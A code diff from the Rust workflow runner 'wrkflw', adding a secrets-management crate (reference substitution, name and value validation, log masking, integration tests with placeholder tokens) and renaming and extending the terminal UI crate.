        for captures in SECRET_PATTERN.captures_iter(text) {
            let full_match = captures.get(0).unwrap().as_str();
            let secret_name = captures.get(1).unwrap().as_str();

            let secret_value = if let Some(cached) = self.resolved_secrets.get(secret_name) {
                cached.clone()
            } else {
                let secret = self.manager.get_secret(secret_name).await?;
                let value = secret.value().to_string();
                self.resolved_secrets
                    .insert(secret_name.to_string(), value.clone());
                value
            };

            result = result.replace(full_match, &secret_value);
        }

        Ok(result)
    }

    /// Get all resolved secrets (for masking purposes)
    pub fn resolved_secrets(&self) -> &HashMap<String, String> {
        &self.resolved_secrets
    }

    /// Check if text contains secret references
    pub fn contains_secrets(text: &str) -> bool {
        SECRET_PATTERN.is_match(text) || PROVIDER_SECRET_PATTERN.is_match(text)
    }

    /// Extract all secret references from text without resolving them
    pub fn extract_secret_refs(text: &str) -> Vec<SecretRef> {
        let mut refs = Vec::new();

        // Extract provider-specific references
        for captures in PROVIDER_SECRET_PATTERN.captures_iter(text) {
            let full_match = captures.get(0).unwrap().as_str();
            let provider = captures.get(1).unwrap().as_str();
            let name = captures.get(2).unwrap().as_str();

            refs.push(SecretRef {
                full_text: full_match.to_string(),
                provider: Some(provider.to_string()),
                name: name.to_string(),
            });
        }

        // Extract default provider references
        for captures in SECRET_PATTERN.captures_iter(text) {
            let full_match = captures.get(0).unwrap().as_str();
            let name = captures.get(1).unwrap().as_str();

            refs.push(SecretRef {
                full_text: full_match.to_string(),
                provider: None,
                name: name.to_string(),
            });
        }

        refs
    }
}

/// A reference to a secret found in text
#[derive(Debug, Clone, PartialEq)]
pub struct SecretRef {
    /// The full text of the secret reference (e.g., "${{ secrets.API_KEY }}")
    pub full_text: String,
    /// The provider name, if specified
    pub provider: Option<String>,
    /// The secret name
    pub name: String,
}

impl SecretRef {
    /// Get the cache key for this secret reference
    pub fn cache_key(&self) -> String {
        match &self.provider {
            Some(provider) => format!("{}:{}", provider, self.name),
            None => self.name.clone(),
        }
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::{SecretError, SecretManager};

    #[tokio::test]
    async fn test_basic_secret_substitution() {
        // Use unique secret names to avoid test conflicts
        let github_token_name = format!("GITHUB_TOKEN_{}", std::process::id());
        let api_key_name = format!("API_KEY_{}", std::process::id());

        std::env::set_var(&github_token_name, "ghp_test_token");
        std::env::set_var(&api_key_name, "secret_api_key");

        let manager = SecretManager::default().await.unwrap();
        let mut substitution = SecretSubstitution::new(&manager);

        let input = format!(
            "Token: ${{{{ secrets.{} }}}}, API: ${{{{ secrets.{} }}}}",
            github_token_name, api_key_name
        );
        let result = substitution.substitute(&input).await.unwrap();

        assert_eq!(result, "Token: ghp_test_token, API: secret_api_key");

        std::env::remove_var(&github_token_name);
        std::env::remove_var(&api_key_name);
    }

    #[tokio::test]
    async fn test_provider_specific_substitution() {
        // Use a unique secret name to avoid test conflicts
        let vault_secret_name = format!("VAULT_SECRET_{}", std::process::id());
        std::env::set_var(&vault_secret_name, "vault_value");

        let manager = SecretManager::default().await.unwrap();
        let mut substitution = SecretSubstitution::new(&manager);

        let input = format!("Value: ${{{{ secrets.env:{} }}}}", vault_secret_name);
        let result = substitution.substitute(&input).await.unwrap();

        assert_eq!(result, "Value: vault_value");

        std::env::remove_var(&vault_secret_name);
    }

    #[tokio::test]
    async fn test_extract_secret_refs() {
        let input = "Token: ${{ secrets.GITHUB_TOKEN }}, Vault: ${{ secrets.vault:API_KEY }}";
        let refs = SecretSubstitution::extract_secret_refs(input);

        assert_eq!(refs.len(), 2);

        let github_ref = &refs.iter().find(|r| r.name == "GITHUB_TOKEN").unwrap();
        assert_eq!(github_ref.provider, None);
        assert_eq!(github_ref.full_text, "${{ secrets.GITHUB_TOKEN }}");

        let vault_ref = &refs.iter().find(|r| r.name == "API_KEY").unwrap();
        assert_eq!(vault_ref.provider, Some("vault".to_string()));
        assert_eq!(vault_ref.full_text, "${{ secrets.vault:API_KEY }}");
    }

    #[tokio::test]
    async fn test_contains_secrets() {
        assert!(SecretSubstitution::contains_secrets(
            "${{ secrets.API_KEY }}"
        ));
        assert!(SecretSubstitution::contains_secrets(
            "${{ secrets.vault:SECRET }}"
        ));
        assert!(!SecretSubstitution::contains_secrets("${{ matrix.os }}"));
        assert!(!SecretSubstitution::contains_secrets("No secrets here"));
    }

    #[tokio::test]
    async fn test_secret_substitution_error_handling() {
        let manager = SecretManager::default().await.unwrap();
        let mut substitution = SecretSubstitution::new(&manager);

        let input = "Token: ${{ secrets.NONEXISTENT_SECRET }}";
        let result = substitution.substitute(input).await;

        assert!(result.is_err());
        match result.unwrap_err() {
            SecretError::NotFound { name } => {
                assert_eq!(name, "NONEXISTENT_SECRET");
            }
            _ => panic!("Expected NotFound error"),
        }
    }
}
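The two reference forms recognized above, exercised through the synchronous helpers (no manager needed):

let text = "user: ${{ secrets.DB_USER }}, pass: ${{ secrets.vault:DB_PASS }}";

assert!(SecretSubstitution::contains_secrets(text));

// Provider-qualified references are extracted first, then default ones;
// the default pattern does not match the colon form, so there is no overlap.
let refs = SecretSubstitution::extract_secret_refs(text);
assert_eq!(refs.len(), 2);
assert_eq!(refs[0].cache_key(), "vault:DB_PASS");
assert_eq!(refs[1].cache_key(), "DB_USER");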
241
crates/secrets/src/validation.rs
Normal file
@@ -0,0 +1,241 @@
// Copyright 2024 wrkflw contributors
// SPDX-License-Identifier: MIT

//! Input validation utilities for secrets management

use crate::{SecretError, SecretResult};
use regex::Regex;

/// Maximum allowed secret value size (1MB)
pub const MAX_SECRET_SIZE: usize = 1024 * 1024;

/// Maximum allowed secret name length
pub const MAX_SECRET_NAME_LENGTH: usize = 255;

lazy_static::lazy_static! {
    /// Valid secret name pattern: alphanumeric, underscores, hyphens, dots
    static ref SECRET_NAME_PATTERN: Regex = Regex::new(r"^[a-zA-Z0-9_.-]+$").unwrap();
}

/// Validate a secret name
pub fn validate_secret_name(name: &str) -> SecretResult<()> {
    if name.is_empty() {
        return Err(SecretError::InvalidSecretName {
            reason: "Secret name cannot be empty".to_string(),
        });
    }

    if name.len() > MAX_SECRET_NAME_LENGTH {
        return Err(SecretError::InvalidSecretName {
            reason: format!(
                "Secret name too long: {} characters (max: {})",
                name.len(),
                MAX_SECRET_NAME_LENGTH
            ),
        });
    }

    if !SECRET_NAME_PATTERN.is_match(name) {
        return Err(SecretError::InvalidSecretName {
            reason: "Secret name can only contain letters, numbers, underscores, hyphens, and dots"
                .to_string(),
        });
    }

    // Check for potentially dangerous patterns
    if name.starts_with('.') || name.ends_with('.') {
        return Err(SecretError::InvalidSecretName {
            reason: "Secret name cannot start or end with a dot".to_string(),
        });
    }

    if name.contains("..") {
        return Err(SecretError::InvalidSecretName {
            reason: "Secret name cannot contain consecutive dots".to_string(),
        });
    }

    // Reserved names
    let reserved_names = [
        "CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8",
        "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
    ];

    if reserved_names.contains(&name.to_uppercase().as_str()) {
        return Err(SecretError::InvalidSecretName {
            reason: format!("'{}' is a reserved name", name),
        });
    }

    Ok(())
}

/// Validate a secret value
pub fn validate_secret_value(value: &str) -> SecretResult<()> {
    let size = value.len();

    if size > MAX_SECRET_SIZE {
        return Err(SecretError::SecretTooLarge {
            size,
            max_size: MAX_SECRET_SIZE,
        });
    }

    // Check for null bytes which could cause issues
    if value.contains('\0') {
        return Err(SecretError::InvalidFormat(
            "Secret value cannot contain null bytes".to_string(),
        ));
    }

    Ok(())
}

/// Validate a provider name
pub fn validate_provider_name(name: &str) -> SecretResult<()> {
    if name.is_empty() {
        return Err(SecretError::InvalidConfig(
            "Provider name cannot be empty".to_string(),
        ));
    }

    if name.len() > 64 {
        return Err(SecretError::InvalidConfig(format!(
            "Provider name too long: {} characters (max: 64)",
            name.len()
        )));
    }

    if !name
        .chars()
        .all(|c| c.is_alphanumeric() || c == '_' || c == '-')
    {
        return Err(SecretError::InvalidConfig(
            "Provider name can only contain letters, numbers, underscores, and hyphens".to_string(),
        ));
    }

    Ok(())
}

/// Sanitize input for logging to prevent log injection attacks
pub fn sanitize_for_logging(input: &str) -> String {
    input
        .chars()
        .map(|c| match c {
            '\n' | '\r' | '\t' => ' ',
            c if c.is_control() => '?',
            c => c,
        })
        .collect()
}

/// Check if a string might be a secret based on common patterns
pub fn looks_like_secret(value: &str) -> bool {
    if value.len() < 8 {
        return false;
    }

    // Check for high entropy (random-looking strings)
    let unique_chars: std::collections::HashSet<char> = value.chars().collect();
    let entropy_ratio = unique_chars.len() as f64 / value.len() as f64;

    if entropy_ratio > 0.6 && value.len() > 16 {
        return true;
    }

    // Check for common secret patterns
    let secret_patterns = [
        r"^[A-Za-z0-9+/=]{40,}$", // Base64-like
        r"^[a-fA-F0-9]{32,}$",    // Hex strings
        r"^[A-Z0-9]{20,}$",       // All caps alphanumeric
        r"^sk_[a-zA-Z0-9_-]+$",   // Stripe-like keys
        r"^pk_[a-zA-Z0-9_-]+$",   // Public keys
        r"^rk_[a-zA-Z0-9_-]+$",   // Restricted keys
    ];

    for pattern in &secret_patterns {
        if let Ok(regex) = Regex::new(pattern) {
            if regex.is_match(value) {
                return true;
            }
        }
    }

    false
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_validate_secret_name() {
        // Valid names
        assert!(validate_secret_name("API_KEY").is_ok());
        assert!(validate_secret_name("database-password").is_ok());
        assert!(validate_secret_name("service.token").is_ok());
        assert!(validate_secret_name("GITHUB_TOKEN_123").is_ok());

        // Invalid names
        assert!(validate_secret_name("").is_err());
        assert!(validate_secret_name("name with spaces").is_err());
        assert!(validate_secret_name("name/with/slashes").is_err());
        assert!(validate_secret_name(".hidden").is_err());
        assert!(validate_secret_name("ending.").is_err());
        assert!(validate_secret_name("double..dot").is_err());
        assert!(validate_secret_name("CON").is_err());
        assert!(validate_secret_name(&"a".repeat(300)).is_err());
    }

    #[test]
    fn test_validate_secret_value() {
        // Valid values
        assert!(validate_secret_value("short_secret").is_ok());
        assert!(validate_secret_value("").is_ok()); // Empty is allowed
        assert!(validate_secret_value(&"a".repeat(1000)).is_ok());

        // Invalid values
        assert!(validate_secret_value(&"a".repeat(MAX_SECRET_SIZE + 1)).is_err());
        assert!(validate_secret_value("secret\0with\0nulls").is_err());
    }

    #[test]
    fn test_validate_provider_name() {
        // Valid names
        assert!(validate_provider_name("env").is_ok());
        assert!(validate_provider_name("file").is_ok());
        assert!(validate_provider_name("aws-secrets").is_ok());
        assert!(validate_provider_name("vault_prod").is_ok());

        // Invalid names
        assert!(validate_provider_name("").is_err());
        assert!(validate_provider_name("name with spaces").is_err());
        assert!(validate_provider_name("name/with/slashes").is_err());
        assert!(validate_provider_name(&"a".repeat(100)).is_err());
    }

    #[test]
    fn test_sanitize_for_logging() {
        assert_eq!(sanitize_for_logging("normal text"), "normal text");
        assert_eq!(sanitize_for_logging("line\nbreak"), "line break");
        assert_eq!(sanitize_for_logging("tab\there"), "tab here");
        assert_eq!(sanitize_for_logging("carriage\rreturn"), "carriage return");
    }

    #[test]
    fn test_looks_like_secret() {
        // Should detect as secrets
        assert!(looks_like_secret("sk_test_abcdefghijklmnop1234567890"));
        assert!(looks_like_secret("abcdefghijklmnopqrstuvwxyz123456"));
        assert!(looks_like_secret("ABCDEF1234567890ABCDEF1234567890"));
        assert!(looks_like_secret(
            "YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY3ODkw"
        ));

        // Should not detect as secrets
        assert!(!looks_like_secret("short"));
        assert!(!looks_like_secret("this_is_just_a_regular_variable_name"));
        assert!(!looks_like_secret("hello world this is plain text"));
    }
}
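A worked instance of the entropy heuristic above; the first case appears in the tests, the second is an added check verified against the logic shown:

// "abcdefghijklmnopqrstuvwxyz123456": 32 chars, all distinct,
// so the ratio is 1.0 > 0.6 with length 32 > 16, and it is flagged.
assert!(looks_like_secret("abcdefghijklmnopqrstuvwxyz123456"));

// 24 repeated 'a's give a ratio of 1/24, match no key-shaped prefix,
// and are too short for the base64/hex patterns: not flagged.
assert!(!looks_like_secret("aaaaaaaaaaaaaaaaaaaaaaaa"));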
350
crates/secrets/tests/integration_tests.rs
Normal file
@@ -0,0 +1,350 @@
// Copyright 2024 wrkflw contributors
// SPDX-License-Identifier: MIT

//! Integration tests for the secrets crate

use std::collections::HashMap;
use std::process;
use tempfile::TempDir;
use tokio;
use wrkflw_secrets::{
    SecretConfig, SecretManager, SecretMasker, SecretProviderConfig, SecretSubstitution,
};

/// Test the end-to-end secret management workflow
#[tokio::test]
async fn test_end_to_end_secret_workflow() {
    // Create a temporary directory for file-based secrets
    let temp_dir = TempDir::new().unwrap();
    let secrets_file = temp_dir.path().join("secrets.json");

    // Create a secrets file
    let secrets_content = r#"
    {
        "database_password": "super_secret_db_pass_123",
        "api_token": "tk_abc123def456ghi789",
        "encryption_key": "key_zyxwvutsrqponmlkjihgfedcba9876543210"
    }
    "#;
    std::fs::write(&secrets_file, secrets_content).unwrap();

    // Set up environment variables
    let env_secret_name = format!("GITHUB_TOKEN_{}", process::id());
    std::env::set_var(&env_secret_name, "ghp_1234567890abcdefghijklmnopqrstuvwxyz");

    // Create the configuration
    let mut providers = HashMap::new();
    providers.insert(
        "env".to_string(),
        SecretProviderConfig::Environment { prefix: None },
    );
    providers.insert(
        "file".to_string(),
        SecretProviderConfig::File {
            path: secrets_file.to_string_lossy().to_string(),
        },
    );

    let config = SecretConfig {
        default_provider: "env".to_string(),
        providers,
        enable_masking: true,
        timeout_seconds: 30,
        enable_caching: true,
        cache_ttl_seconds: 300,
        rate_limit: Default::default(),
    };

    // Initialize the secret manager
    let manager = SecretManager::new(config).await.unwrap();

    // Test 1: Get a secret from the environment provider
    let env_secret = manager.get_secret(&env_secret_name).await.unwrap();
    assert_eq!(
        env_secret.value(),
        "ghp_1234567890abcdefghijklmnopqrstuvwxyz"
    );
    assert_eq!(
        env_secret.metadata.get("source"),
        Some(&"environment".to_string())
    );

    // Test 2: Get a secret from the file provider
    let file_secret = manager
        .get_secret_from_provider("file", "database_password")
        .await
        .unwrap();
    assert_eq!(file_secret.value(), "super_secret_db_pass_123");
    assert_eq!(
        file_secret.metadata.get("source"),
        Some(&"file".to_string())
    );

    // Test 3: List secrets from the file provider
    let all_secrets = manager.list_all_secrets().await.unwrap();
    assert!(all_secrets.contains_key("file"));
    let file_secrets = &all_secrets["file"];
    assert!(file_secrets.contains(&"database_password".to_string()));
    assert!(file_secrets.contains(&"api_token".to_string()));
    assert!(file_secrets.contains(&"encryption_key".to_string()));

    // Test 4: Secret substitution
    let mut substitution = SecretSubstitution::new(&manager);
    let input = format!(
        "Database: ${{{{ secrets.file:database_password }}}}, GitHub: ${{{{ secrets.{} }}}}",
        env_secret_name
    );
    let output = substitution.substitute(&input).await.unwrap();
    assert!(output.contains("super_secret_db_pass_123"));
    assert!(output.contains("ghp_1234567890abcdefghijklmnopqrstuvwxyz"));

    // Test 5: Secret masking
    let mut masker = SecretMasker::new();
    masker.add_secret("super_secret_db_pass_123");
    masker.add_secret("ghp_1234567890abcdefghijklmnopqrstuvwxyz");

    let log_message = "Connection failed: super_secret_db_pass_123 invalid for ghp_1234567890abcdefghijklmnopqrstuvwxyz";
    let masked = masker.mask(log_message);
    assert!(!masked.contains("super_secret_db_pass_123"));
    assert!(!masked.contains("ghp_1234567890abcdefghijklmnopqrstuvwxyz"));
    assert!(masked.contains("***"));

    // Test 6: Health check
    let health_results = manager.health_check().await;
    assert!(health_results.get("env").unwrap().is_ok());
    assert!(health_results.get("file").unwrap().is_ok());

    // Test 7: Caching behavior - a functional test instead of a timing test.
    // The first call should succeed and populate the cache.
    let cached_secret = manager.get_secret(&env_secret_name).await.unwrap();
    assert_eq!(
        cached_secret.value(),
        "ghp_1234567890abcdefghijklmnopqrstuvwxyz"
    );

    // Remove the environment variable to test whether the cache works
    std::env::remove_var(&env_secret_name);

    // The second call should still succeed because the value is cached
    let cached_secret_2 = manager.get_secret(&env_secret_name).await.unwrap();
    assert_eq!(
        cached_secret_2.value(),
        "ghp_1234567890abcdefghijklmnopqrstuvwxyz"
    );

    // Restore the environment variable for cleanup
    std::env::set_var(&env_secret_name, "ghp_1234567890abcdefghijklmnopqrstuvwxyz");

    // Cleanup
    std::env::remove_var(&env_secret_name);
}

/// Test error handling scenarios
#[tokio::test]
async fn test_error_handling() {
    let manager = SecretManager::default().await.unwrap();

    // Test 1: Secret not found
    let result = manager.get_secret("NONEXISTENT_SECRET_12345").await;
    assert!(result.is_err());
    assert!(result.unwrap_err().to_string().contains("not found"));

    // Test 2: Invalid provider
    let result = manager
        .get_secret_from_provider("invalid_provider", "some_secret")
        .await;
    assert!(result.is_err());
    assert!(result.unwrap_err().to_string().contains("not found"));

    // Test 3: Invalid secret name
    let result = manager.get_secret("").await;
    assert!(result.is_err());
    assert!(result.unwrap_err().to_string().contains("cannot be empty"));

    // Test 4: Invalid secret name with special characters
    let result = manager.get_secret("invalid/secret/name").await;
    assert!(result.is_err());
    assert!(result.unwrap_err().to_string().contains("can only contain"));
}

/// Test rate limiting functionality
#[tokio::test]
async fn test_rate_limiting() {
    use std::time::Duration;
    use wrkflw_secrets::rate_limit::RateLimitConfig;

    // Create a config with a very low rate limit
    let mut config = SecretConfig::default();
    config.rate_limit = RateLimitConfig {
        max_requests: 2,
        window_duration: Duration::from_secs(10),
        enabled: true,
    };

    let manager = SecretManager::new(config).await.unwrap();

    // Set up a test secret
    let test_secret_name = format!("RATE_LIMIT_TEST_{}", process::id());
    std::env::set_var(&test_secret_name, "test_value");

    // The first two requests should succeed
    let result1 = manager.get_secret(&test_secret_name).await;
    assert!(result1.is_ok());

    let result2 = manager.get_secret(&test_secret_name).await;
    assert!(result2.is_ok());

    // The third request should fail due to rate limiting
    let result3 = manager.get_secret(&test_secret_name).await;
    assert!(result3.is_err());
    assert!(result3
        .unwrap_err()
        .to_string()
        .contains("Rate limit exceeded"));

    // Cleanup
    std::env::remove_var(&test_secret_name);
}

/// Test concurrent access patterns
#[tokio::test]
async fn test_concurrent_access() {
    use std::sync::Arc;

    let manager = Arc::new(SecretManager::default().await.unwrap());

    // Set up a test secret
    let test_secret_name = format!("CONCURRENT_TEST_{}", process::id());
    std::env::set_var(&test_secret_name, "concurrent_test_value");

    // Spawn multiple concurrent tasks
    let mut handles = Vec::new();
    for i in 0..10 {
        let manager_clone = Arc::clone(&manager);
        let secret_name = test_secret_name.clone();
        let handle = tokio::spawn(async move {
            let result = manager_clone.get_secret(&secret_name).await;
            (i, result)
        });
        handles.push(handle);
    }

    // Wait for all tasks to complete
    let mut successful_requests = 0;
    for handle in handles {
        let (_, result) = handle.await.unwrap();
        if result.is_ok() {
            successful_requests += 1;
            assert_eq!(result.unwrap().value(), "concurrent_test_value");
        }
    }

    // At least some requests should succeed (depending on rate limiting)
    assert!(successful_requests > 0);

    // Cleanup
    std::env::remove_var(&test_secret_name);
}

/// Test secret substitution edge cases
#[tokio::test]
async fn test_substitution_edge_cases() {
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
|
||||
// Set up test secrets
|
||||
let secret1_name = format!("EDGE_CASE_1_{}", process::id());
|
||||
let secret2_name = format!("EDGE_CASE_2_{}", process::id());
|
||||
std::env::set_var(&secret1_name, "value1");
|
||||
std::env::set_var(&secret2_name, "value2");
|
||||
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
// Test 1: Multiple references to the same secret
|
||||
let input = format!(
|
||||
"First: ${{{{ secrets.{} }}}} Second: ${{{{ secrets.{} }}}}",
|
||||
secret1_name, secret1_name
|
||||
);
|
||||
let output = substitution.substitute(&input).await.unwrap();
|
||||
assert_eq!(output, "First: value1 Second: value1");
|
||||
|
||||
// Test 2: Nested-like patterns (should not be substituted)
|
||||
let input = "This is not a secret: ${ secrets.FAKE }";
|
||||
let output = substitution.substitute(&input).await.unwrap();
|
||||
assert_eq!(input, output); // Should remain unchanged
|
||||
|
||||
// Test 3: Mixed valid and invalid references
|
||||
let input = format!(
|
||||
"Valid: ${{{{ secrets.{} }}}} Invalid: ${{{{ secrets.NONEXISTENT }}}}",
|
||||
secret1_name
|
||||
);
|
||||
let result = substitution.substitute(&input).await;
|
||||
assert!(result.is_err()); // Should fail due to missing secret
|
||||
|
||||
// Test 4: Empty input
|
||||
let output = substitution.substitute("").await.unwrap();
|
||||
assert_eq!(output, "");
|
||||
|
||||
// Test 5: No secret references
|
||||
let input = "This is just plain text with no secrets";
|
||||
let output = substitution.substitute(input).await.unwrap();
|
||||
assert_eq!(input, output);
|
||||
|
||||
// Cleanup
|
||||
std::env::remove_var(&secret1_name);
|
||||
std::env::remove_var(&secret2_name);
|
||||
}
|
||||
|
||||
/// Test masking comprehensive patterns
|
||||
#[tokio::test]
|
||||
async fn test_comprehensive_masking() {
|
||||
let mut masker = SecretMasker::new();
|
||||
|
||||
// Add various types of secrets
|
||||
masker.add_secret("password123");
|
||||
masker.add_secret("api_key_abcdef123456");
|
||||
masker.add_secret("very_long_secret_key_that_should_preserve_structure_987654321");
|
||||
|
||||
// Test various input scenarios
|
||||
let test_cases = vec![
|
||||
(
|
||||
"Password is password123 and API key is api_key_abcdef123456",
|
||||
vec!["password123", "api_key_abcdef123456"],
|
||||
),
|
||||
(
|
||||
"GitHub token: ghp_1234567890123456789012345678901234567890",
|
||||
vec!["ghp_"],
|
||||
),
|
||||
(
|
||||
"AWS key: AKIAIOSFODNN7EXAMPLE",
|
||||
vec!["AKIA"],
|
||||
),
|
||||
(
|
||||
"JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c",
|
||||
vec!["eyJ", "***"],
|
||||
),
|
||||
];
|
||||
|
||||
for (input, should_not_contain) in test_cases {
|
||||
let masked = masker.mask(input);
|
||||
for pattern in should_not_contain {
|
||||
if pattern != "***" {
|
||||
assert!(
|
||||
!masked.contains(pattern)
|
||||
|| pattern == "ghp_"
|
||||
|| pattern == "AKIA"
|
||||
|| pattern == "eyJ",
|
||||
"Masked text '{}' should not contain '{}' (or only partial patterns)",
|
||||
masked,
|
||||
pattern
|
||||
);
|
||||
} else {
|
||||
assert!(
|
||||
masked.contains(pattern),
|
||||
"Masked text '{}' should contain '{}'",
|
||||
masked,
|
||||
pattern
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
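The integration tests above double as usage documentation for `wrkflw-secrets`. A condensed sketch of the happy path they exercise, assuming the same `SecretManager`, `SecretSubstitution`, and `SecretMasker` APIs (imports and error type are assumptions; the calls themselves are the ones the tests make):

```rust
// Sketch only: mirrors the API exercised by the integration tests above.
use wrkflw_secrets::{SecretManager, SecretMasker, SecretSubstitution};

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // The env provider resolves secrets from process environment variables.
    std::env::set_var("MY_TOKEN", "ghp_example_token_value");

    let manager = SecretManager::default().await?;
    let token = manager.get_secret("MY_TOKEN").await?;

    // Substitute `${{ secrets.NAME }}` references, as in Test 4 above.
    let mut substitution = SecretSubstitution::new(&manager);
    let rendered = substitution
        .substitute("token: ${{ secrets.MY_TOKEN }}")
        .await?;

    // Mask known secret values before logging, as in Test 5 above.
    let mut masker = SecretMasker::new();
    masker.add_secret(token.value());
    println!("{}", masker.mask(&rendered)); // secret replaced by a mask such as "***"

    std::env::remove_var("MY_TOKEN");
    Ok(())
}
```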
crates/ui/Cargo.toml
@@ -1,18 +1,23 @@
[package]
name = "ui"
name = "wrkflw-ui"
version.workspace = true
edition.workspace = true
description = "user interface functionality for wrkflw"
description = "Terminal user interface for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
models = { path = "../models" }
evaluator = { path = "../evaluator" }
executor = { path = "../executor" }
logging = { path = "../logging" }
utils = { path = "../utils" }
github = { path = "../github" }
wrkflw-models.workspace = true
wrkflw-evaluator.workspace = true
wrkflw-executor.workspace = true
wrkflw-logging.workspace = true
wrkflw-utils.workspace = true
wrkflw-github.workspace = true

# External dependencies
chrono.workspace = true

23 crates/ui/README.md (new file)
@@ -0,0 +1,23 @@
## wrkflw-ui

Terminal user interface for browsing workflows, running them, and viewing logs.

- Tabs: Workflows, Execution, Logs, Help
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
- Integrates with `wrkflw-executor` and `wrkflw-logging`

### Example

```rust
use std::path::PathBuf;
use wrkflw_executor::RuntimeType;
use wrkflw_ui::run_wrkflw_tui;

# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.
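A hypothetical variant worth noting, not taken from the README itself: the same entry point also accepts the emulation runtime that the TUI falls back to when no container engine is found, using the `RuntimeType::Emulation` variant that appears throughout this changeset.

```rust
use std::path::PathBuf;
use wrkflw_executor::RuntimeType;
use wrkflw_ui::run_wrkflw_tui;

# tokio_test::block_on(async {
// Assumed variant of the example above: run without Docker or Podman.
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Emulation, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```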
@@ -11,12 +11,12 @@ use crossterm::{
    execute,
    terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
};
use executor::RuntimeType;
use ratatui::{backend::CrosstermBackend, Terminal};
use std::io::{self, stdout};
use std::path::PathBuf;
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::RuntimeType;

pub use state::App;

@@ -50,7 +50,7 @@ pub async fn run_wrkflw_tui(

    if app.validation_mode {
        app.logs.push("Starting in validation mode".to_string());
        logging::info("Starting in validation mode");
        wrkflw_logging::info("Starting in validation mode");
    }

    // Load workflows
@@ -108,13 +108,13 @@ pub async fn run_wrkflw_tui(
        Ok(_) => Ok(()),
        Err(e) => {
            // If the TUI fails to initialize or crashes, fall back to CLI mode
            logging::error(&format!("Failed to start UI: {}", e));
            wrkflw_logging::error(&format!("Failed to start UI: {}", e));

            // Only for 'tui' command should we fall back to CLI mode for files
            // For other commands, return the error
            if let Some(path) = path {
                if path.is_file() {
                    logging::error("Falling back to CLI mode...");
                    wrkflw_logging::error("Falling back to CLI mode...");
                    crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
                        .await
                } else if path.is_dir() {
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
        if last_tick.elapsed() >= tick_rate {
            app.tick();
            app.update_running_workflow_progress();

            // Check for log processing updates (includes system log change detection)
            app.check_log_processing_updates();

            // Request log processing if needed
            if app.logs_need_update {
                app.request_log_processing_update();
            }

            last_tick = Instant::now();
        }

@@ -180,6 +189,25 @@ fn run_tui_event_loop(
                    continue;
                }

                // Handle help overlay scrolling
                if app.show_help {
                    match key.code {
                        KeyCode::Up | KeyCode::Char('k') => {
                            app.scroll_help_up();
                            continue;
                        }
                        KeyCode::Down | KeyCode::Char('j') => {
                            app.scroll_help_down();
                            continue;
                        }
                        KeyCode::Esc | KeyCode::Char('?') => {
                            app.show_help = false;
                            continue;
                        }
                        _ => {}
                    }
                }

                match key.code {
                    KeyCode::Char('q') => {
                        // Exit and clean up
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
                        } else {
                            app.scroll_logs_up();
                        }
                    } else if app.selected_tab == 3 {
                        app.scroll_help_up();
                    } else if app.selected_tab == 0 {
                        app.previous_workflow();
                    } else if app.selected_tab == 1 {
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
                        } else {
                            app.scroll_logs_down();
                        }
                    } else if app.selected_tab == 3 {
                        app.scroll_help_down();
                    } else if app.selected_tab == 0 {
                        app.next_workflow();
                    } else if app.selected_tab == 1 {
@@ -273,7 +305,7 @@ fn run_tui_event_loop(
                            "[{}] DEBUG: Shift+r detected - this should be uppercase R",
                            timestamp
                        ));
                        logging::info(
                        wrkflw_logging::info(
                            "Shift+r detected as lowercase - this should be uppercase R",
                        );

@@ -329,7 +361,7 @@ fn run_tui_event_loop(
                            "[{}] DEBUG: Reset key 'Shift+R' pressed",
                            timestamp
                        ));
                        logging::info("Reset key 'Shift+R' pressed");
                        wrkflw_logging::info("Reset key 'Shift+R' pressed");

                        if !app.running {
                            // Reset workflow status
@@ -367,7 +399,7 @@ fn run_tui_event_loop(
                                    "Workflow '{}' is already running",
                                    workflow.name
                                ));
                                logging::warning(&format!(
                                wrkflw_logging::warning(&format!(
                                    "Workflow '{}' is already running",
                                    workflow.name
                                ));
@@ -408,7 +440,7 @@ fn run_tui_event_loop(
                                ));
                            }

                            logging::warning(&format!(
                            wrkflw_logging::warning(&format!(
                                "Cannot trigger workflow in {} state",
                                status_text
                            ));
@@ -416,20 +448,22 @@ fn run_tui_event_loop(
                        }
                    } else {
                        app.logs.push("No workflow selected to trigger".to_string());
                        logging::warning("No workflow selected to trigger");
                        wrkflw_logging::warning("No workflow selected to trigger");
                    }
                } else if app.running {
                    app.logs.push(
                        "Cannot trigger workflow while another operation is in progress"
                            .to_string(),
                    );
                    logging::warning(
                    wrkflw_logging::warning(
                        "Cannot trigger workflow while another operation is in progress",
                    );
                } else if app.selected_tab != 0 {
                    app.logs
                        .push("Switch to Workflows tab to trigger a workflow".to_string());
